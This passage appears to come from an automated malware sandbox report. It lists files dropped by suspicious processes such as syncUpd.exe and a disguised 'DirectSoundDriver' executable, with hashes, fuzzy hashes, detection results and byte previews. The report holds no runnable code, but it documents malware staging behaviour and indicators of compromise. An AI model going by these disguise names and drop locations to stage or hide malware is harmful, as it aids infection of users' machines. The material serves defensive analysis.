                                                                                                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\CGDHIEGC

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.136413900497188
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1888210
                                                                                                                          Entropy (8bit):6.979353805786148
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:lHZ2IxEvbn0MdESx+ZFehvnATV3oR6GKIlb/xBxlKtIH6/qKsTRBEqkF71elDPIL:lJxEvnE6oUhPATV4RsIb/xBxlKe27Qu
                                                                                                                          MD5:7BFD8C9EBE20C4BF0BED7F74A74E8646
                                                                                                                          SHA1:6098711FD405855097A78442A8A195E04BFAB1CD
                                                                                                                          SHA-256:BA6625BECE4E980DE77E555B8626F63BEC81CA9BA3E40701F7ED201DB25153FD
                                                                                                                          SHA-512:8DF13158A2D806A6E2D49CECA8DEE411E07F96F63876DBD64E6ED3424765062312AC1C4E7EB0EB7683443240B9B52022F8977094063A1509395A6C45BEEC6893
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.i^..........'.................0.............@..................................................................................................................................................................................................text............................... ..`.rdata.. 1.......@..................@..@.data....T... ...0... ..............@....rsrc................P..............@..@.short1..............P..............`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\EGCFHDAKECFIDGDGDBKJDGIIID

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\EHDHIDAE

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):196608
                                                                                                                          Entropy (8bit):1.121297215059106
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\KKKKEHJKFCFCBFHIIDGD

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.8307187998793589
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugw:gJjJGtpTq2yv1AuNZRY3diu8iBVqFy
                                                                                                                          MD5:F653F49EB4E03B5702FA1F65EFCDAD47
                                                                                                                          SHA1:A34388C6FE8FC8B65140FB5834803FBDBAEB6CA5
                                                                                                                          SHA-256:C710B8F336AFC7017EB91299C85D5232DFEA87CA2C359F313135C5B5E07B0393
                                                                                                                          SHA-512:61C327C77B33E2F86CD997956E793C92A355DB4094ABEE226279C9DD906930A67E07CCD00C51EF8962B37330B45BEE59D048B6739A36E7AECE6021BE28E400A5
                                                                                                                          Malicious:false
                                                                                                                          Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb12a3052, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.6585732542421516
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                          MD5:88EA1DCE28C00796DF2528433DFEA0F1
                                                                                                                          SHA1:54B22C4233B98CFF37D3F5FE8102714DD3F0E352
                                                                                                                          SHA-256:9AFED7E27560DA3F514B85B098312B7016B60E64BCB8E57EC4099D15E6C9C9BC
                                                                                                                          SHA-512:B5AE9023F5F2406205DC1AC606436C0D4A2211272BACCC8D6C1983A1151CE2F0528CB1FF2625E2E9BF02C7B84E7600C72F2F4796FCF0DAE41EA9AEEE0E753BC2
                                                                                                                          Malicious:false
                                                                                                                          Preview:.*0R... ...............X\...;...{......................0.z..........{...4...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...................................!F..4...|.................}..!.4...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.08072633064392432
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:n1/llKYeWMzltGuAJkhvekl1qyH/AllrekGltll/SPj:HlKz1ZtrxlvfAJe3l
                                                                                                                          MD5:2C294982ECFE7A37E5F6FE849A769645
                                                                                                                          SHA1:96D0654FF784D721EDCA3D02C326FB057C586794
                                                                                                                          SHA-256:1E881C3820D32C394D01169B0E4BC95C5FEF75ACD32B3A59B26834A5FD6E884C
                                                                                                                          SHA-512:929115FAE1B7575462AEB94855D9966812D0C5AC4937F86FBD71164E7066A57D139885D323AAEAC33CCD67F129B9CA3BD669815B802D283E9BEE35AA4DEDC327
                                                                                                                          Malicious:false
                                                                                                                          Preview:.=;......................................;...{...4...|.......{...............{.......{...XL......{..................}..!.4...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER3900.tmp.csv

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105090
                                                                                                                          Entropy (8bit):3.0801252322244173
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:S2fuymxE7GD7T62DugrEj/5MdDaBC46+2+s+o+6+9+i+m+Rvo+M+w+E+o+T+o+Z4:8
                                                                                                                          MD5:D649A2A3582414314A1121C9A6AE34E4
                                                                                                                          SHA1:2D49675B269D721BBF0A01D1329BF14146B7B051
                                                                                                                          SHA-256:EB956A234C6884D85983825D45684941CE00E1F219A5E30A8DF45E978F891B79
                                                                                                                          SHA-512:6BD84405538409230A8B60906B30ACE641377ECBDA2D82EF4F394CDBDACA3D72E58165D13C2CA60E6ACBC515B78FFEA35CA5AEEF3EF138DE46E91A4A82DA7B12
                                                                                                                          Malicious:false
                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER636C.tmp.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13340
                                                                                                                          Entropy (8bit):2.695816926002427
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:TiZYWcLS+lieYqYcUBWrNDhHRUYEZmEtFiN0ettwOzNnTxlaBr0BMYqwCInhF:2ZDWP9hNfVxPaN0BMlwlnhF
                                                                                                                          MD5:729D23135ACD62FC075AD0E3D6B53443
                                                                                                                          SHA1:00CC2C4038D8BAACF0C33821270BD0990CFA9912
                                                                                                                          SHA-256:97EB1C1870A84378C29C94234EE4BF1F5A2416002E848EE4D43FF6BD017E3CA1
                                                                                                                          SHA-512:65C347E0EA5CF5D61F029570F494189DF7C2EFA782ECCF02BFD93D34DB5C509F0AF8EE15D1CC5DEB6DD64BF1DCB648CB62B980055B53CEFB2E2F59B2D25FA6A5
                                                                                                                          Malicious:false
                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D1D.tmp.csv

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):112642
                                                                                                                          Entropy (8bit):3.0797128617955827
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:4e/waNT4x662Dt4pOJeQlg3IjDh/+46+2+s+o+6+9+i+m+Rvo+M+w+E+o+T+o+ZN:V
                                                                                                                          MD5:8F7FEB45CB187B4B6EDF07BE841E43F4
                                                                                                                          SHA1:321C0E6B34D081B6ECD65284A595D450C3DDC64C
                                                                                                                          SHA-256:9135B5655EA37079ED0C46DB025F505C80CAE0F1C380DCBBF86244858506231E
                                                                                                                          SHA-512:DB866A1178D838C84C2F5D87BBD0FA3F299C57280A96DAE0D11559A5F6EEF087D0A52884C45F3805F024DABB5FFD00369E88A966A220A2F20064B1F7F9E7B046
                                                                                                                          Malicious:false
                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA70F.tmp.csv

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):113468
                                                                                                                          Entropy (8bit):3.080091859309462
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:bEET47wqpFKs9DVQyjLbS9q46+2+s+o+6+9+i+m+Rvo+M+w+E+o+T+o+Z2+P+yrN:H
                                                                                                                          MD5:58B26093E95C6A18E2079D197D6F5EB5
                                                                                                                          SHA1:3A3DEE2ADAEC8E301ACEC88D615F1880C55FAE6D
                                                                                                                          SHA-256:BE9C6205A820E18589F3BE20AB5E5DEDA33680F59DBDFB6F9E3D636FA4398E2E
                                                                                                                          SHA-512:D4A31530FEA4F9A1B9E9CEB0EE82C1E02FF66A26AB0ACDEB3A225E0E494832CC2F56DD8E713C3C35D31C261166F96867337F5E2F2E4D653423219940EE6C58D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERADC6.tmp.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13340
                                                                                                                          Entropy (8bit):2.6976344757843065
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:TiZYWs6FecEkYOxYIWDAhHSEUYEZbUtFiF04t+wlCqaY0MMUNw8I5hC:2ZD19/xoRJ5aY0MMew75hC
                                                                                                                          MD5:D12DC2FCB8AF8CE505F62F71D4FC6F07
                                                                                                                          SHA1:EB40CF7B90AB42AD414AB04E51817A73E90B20B9
                                                                                                                          SHA-256:337E14BEC29169F2AC60AFABD36D6E95C9A2904E80FB7DE00531079E88C288DA
                                                                                                                          SHA-512:4BFE7DC60BEF8CBFFC37E968C0226BDF970C91A03E53DB70AF6361691508A504941E6BBD7794049F91750CBA702469AB12E620F3BA1E0ACCE06C2359535F5F18
                                                                                                                          Malicious:false
                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC084.tmp.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13340
                                                                                                                          Entropy (8bit):2.6978252479618203
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:TiZYWJHRs7YAYJWT/hH/UYEZjxtFi60btI6wMIhDa2x0kMdwRIQhV:2ZDSHo0MDam0kMdwOQhV
                                                                                                                          MD5:36CB5748D30D370089A4084943E7C949
                                                                                                                          SHA1:F7FCAF66E7E19FA6616DAB3F446230A678379203
                                                                                                                          SHA-256:DEBC90E7E7A38C90C1B4724F021DFB1274ADD6BC70A315CEED70497AFCA69647
                                                                                                                          SHA-512:E0F7F4A758F01C72A9C3E56E7B2FF0271879AFDAA0ECEAD0068F9273D0152CF1ABB790A71BBA959F5A79CB235683C467B36146D4F6F0E227D401E538D740F9CF
                                                                                                                          Malicious:false
                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                          C:\ProgramData\rc67.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4
                                                                                                                          Entropy (8bit):0.8112781244591328
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:r:r
                                                                                                                          MD5:1036E3DDDC89A4E68D8A33F3823A180E
                                                                                                                          SHA1:D6459AB29C7B9A9FBF0C7C15FA35FAA30FBF8CC6
                                                                                                                          SHA-256:FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02
                                                                                                                          SHA-512:9DB5EA5024F5A3AF2B82E9B346AA029EA45364CA0361BB2BCFE7040B869DDE1177D8FDC36C508BD81BDD03913CC9DAD429C301A3232759B732AB976CCE929971
                                                                                                                          Malicious:false
                                                                                                                          Preview:....

                                                                                                                          C:\ProgramData\resource-a.dat

                                                                                                                          Download File
